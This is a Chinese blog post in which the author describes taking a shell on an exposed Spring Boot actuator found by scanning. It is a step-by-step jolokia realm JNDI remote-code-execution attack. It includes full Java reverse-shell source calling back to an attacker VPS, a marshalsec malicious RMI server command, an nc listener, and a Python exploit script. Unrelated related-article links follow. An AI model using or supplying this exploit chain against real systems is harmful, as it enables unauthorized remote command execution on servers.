日穿扫描扫到一个spring boot actuator

可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字



可以使用jolokia-realm-jndi-rce具体步骤如下

先用python3开一个web服务

python3 -m http.server 8080

编译java利用代码

/**

 *  javac -source 1.5 -target 1.5 JNDIObject.java

 *

 *  Build By LandGrey

 * */

import java.io.File;

import java.io.InputStream;

import java.io.OutputStream;

import java.net.Socket;

public class JNDIObject {

    static {

        try{

            String ip = "your-vps-ip";

            String port = "443";

            String py_path = null;

            String[] cmd;

            if (!System.getProperty("os.name").toLowerCase().contains("windows")) {

                String[] py_envs = new String[]{"/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};

                for(int i = 0; i < py_envs.length; ++i) {

                    String py = py_envs[i];

                    if ((new File(py)).exists()) {

                        py_path = py;

                        break;

                    }

                }

                if (py_path != null) {

                    if ((new File("/bin/bash")).exists()) {

                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"};

                    } else {

                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"};

                    }

                } else {

                    if ((new File("/bin/bash")).exists()) {

                        cmd = new String[]{"/bin/bash"};

                    } else {

                        cmd = new String[]{"/bin/sh"};

                    }

                }

            } else {

                cmd = new String[]{"cmd.exe"};

            }

            Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();

            Socket s = new Socket(ip, Integer.parseInt(port));

            InputStream pi = p.getInputStream();

            InputStream pe = p.getErrorStream();

            InputStream si = s.getInputStream();

            OutputStream po = p.getOutputStream();

            OutputStream so = s.getOutputStream();

            while(!s.isClosed()) {

                while(pi.available() > 0) {

                    so.write(pi.read());

                }

                while(pe.available() > 0) {

                    so.write(pe.read());

                }

                while(si.available() > 0) {

                    po.write(si.read());

                }

                so.flush();

                po.flush();

                Thread.sleep(50L);

                try {

                    p.exitValue();

                    break;

                } catch (Exception e) {

                }

            }

            p.destroy();

            s.close();

        }catch (Throwable e){

            e.printStackTrace();

        }

    }

}


javac -source 1.5 -target 1.5 JNDIObject.java

架设恶意 rmi 服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#JNDIObject 1389

监听端口

nc -lvp 443



执行exp

#!/usr/bin/env python3

# coding: utf-8

# Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt

import requests

url = 'http://127.0.0.1:8080/jolokia'

create_realm = {

    "mbean": "Tomcat:type=MBeanFactory",

    "type": "EXEC",

    "operation": "createJNDIRealm",

    "arguments": ["Tomcat:type=Engine"]

}

wirte_factory = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "WRITE",

    "attribute": "contextFactory",

    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"

}

write_url = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "WRITE",

    "attribute": "connectionURL",

    "value": "rmi://your-vps-ip:1389/JNDIObject"

}

stop = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "EXEC",

    "operation": "stop",

    "arguments": []

}

start = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "EXEC",

    "operation": "start",

    "arguments": []

}

flow = [create_realm, wirte_factory, write_url, stop, start]

for i in flow:

    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))

    r = requests.post(url, json=i)

    r.json()

    print(r.status_code)


python3 springboot-realm-jndi-rce.py



然后等两秒shell就回来了

那些年拿过的shell之springboot jolokia rce的更多相关文章

  1. springboot打包不同环境配置与shell脚本部署

    本篇和大家分享的是springboot打包并结合shell脚本命令部署,重点在分享一个shell程序启动工具,希望能便利工作: profiles指定不同环境的配置 maven-assembly-plu ...

  2. Shell脚本 自动部署 SpringBoot 应用

    公司项目使用了SpringBoot.开发的应用需要自动上传到服务器.虽然目前对热部署还没完全掌握.先使用shell简化一下部署吧. # 上传密钥 sshLoginKey=/f/MyFile/root. ...

  3. 【springboot】之利用shell脚本优雅启动,关闭springboot服务

    springbot开发api接口服务,生产环境中一般都是运行独立的jar,在部署过程中涉及到服务的优雅启动,关闭, springboot官方文档给出的有两种方式, 1.使用http shutdown ...

  4. 在idea中编写自动拉取、编译、启动springboot项目的shell脚本

    idea 开发环境搭建 idea中安装shell开发插件 服务器具备的条件 已经安装 lsof(用于检查端口占用) 已安装 git 安装 maven 有 java 环境 背景 代码提交到仓库后,需要在 ...

  5. 编写shell脚本让springboot项目在CentOS中开机自启动

    springboot项目部署在CentOS系统上时,如果遇到停电关机,公司的实施人员就得跑到甲方现场重新启动项目并测试,很是麻烦,这里探讨如何编写shell脚本控制springboot项目开机时自动启 ...

  6. Dockerfile 构建后端springboot应用并用shell脚本实现jenkins自动构建

    Dockerfile 文件构建docker镜像 FROM centos MAINTAINER zh*****eng "z*******ch.cn" ENV LANG en_US.U ...

  7. SpringBoot打成的jar包发布,shell关闭之后一直在服务器运行

    1:可以编写shell脚本, 切换到执行的jar包目录,然后使用nohup  让改命令在服务器一直运行 #!/bin/bash cd /srv/ftp/public nohup java -jar l ...

  8. springboot使用api操作HBase之shell

    HBase的基本读写流程写入流程读取流程HBase的模块与协作HBase启动RegionServer失效HMaster失效HBase常用的Shell命令进入shellhelp命令查询服务器状态查看所有 ...

  9. 编写shell脚本,使用 nohup 让springboot 项目在后台持续运行

    1.将springboot项目打成jar放在linux的某个目录下. 2.新建一个nohup.log文件. 3.使用vi命令新建一个start.sh文件并写下以下内容: #!/bin/sh nohup ...

随机推荐

  1. 二.4vue展示用户数据及用户组操作以及给用户组添加额外字段

    一.用户列表 1.新建(1)views/users/index.vue: <template> <div class="user-list-container"& ...

  2. IntelliJ IDEA快速实现Docker镜像部署

    一.Docker开启远程访问 [root@izwz9eftauv7x69f5jvi96z docker]# vim /usr/lib/systemd/system/docker.service #修改 ...

  3. 带你认识网站图片img懒加载和预加载的区别

    懒加载 什么是懒加载? 懒加载也就是延迟加载.当访问一个页面的时候,先把img元素或是其他元素的背景图片路径替换成一张大小为1*1px图片的路径(这样就只需请求一次,俗称占位图),只有当图片出现在浏览 ...

  4. KMP入门

    First.先上一份最原始的无任何优化的代码(暴力): #include <iostream> #include <cstring> using namespace std; ...

  5. day20 函数收尾+面向过程+模块

    目录 一.算法(二分法) 二.面向过程与函数式 1 编程范式/思想 2 面向过程 3 函数式 3.1 匿名函数与lambda 三.模块 1 什么是模块 2 为何要有模块 3 怎么用模块 3.1第一次导 ...

  6. Elasticsearch 内存配置应用案例

    Elasticsearch 内存配置 有三个可选项: 你主要做全文检索吗?考虑给 Elasticsearch 4 - 32 GB 的内存, 让 Lucene 通过操作系统文件缓存来利用余下的内存.那些 ...

  7. Spring Boot 2 实战:常用读取配置的方式

    1. 前言 在Spring Boot项目中我们经常需要读取application.yml配置文件的自定义配置,今天就来罗列一下从yaml读取配置文件的一些常用手段和方法. 2. 使用@Value注解 ...

  8. Mysql基础(五):多表查询、pymysql模块

    目录 数据库04 /多表查询.pymysql模块 1. 笛卡尔积 2. 连表查询 3. 子查询 4. pymysql模块 数据库04 /多表查询.pymysql模块 1. 笛卡尔积 将两表所有的数据一 ...

  9. 数据可视化之powerBI基础(十一)Power BI中的数据如何导出到Excel中?

    https://zhuanlan.zhihu.com/p/64415543 把Excel中数据加载到PowerBI中我们都已经熟悉了,但是怎么把在PowerBI中处理好的数据导出到Excel中呢?毕竟 ...

  10. keras 文本序列的相关api

    1.word_tokenizer = Tokenizer(MAX_WORD_NUMS)    MAX_WORD_NUMS设置词典的最大值,为一个int型数值 2.word_tokenizer.fit_ ...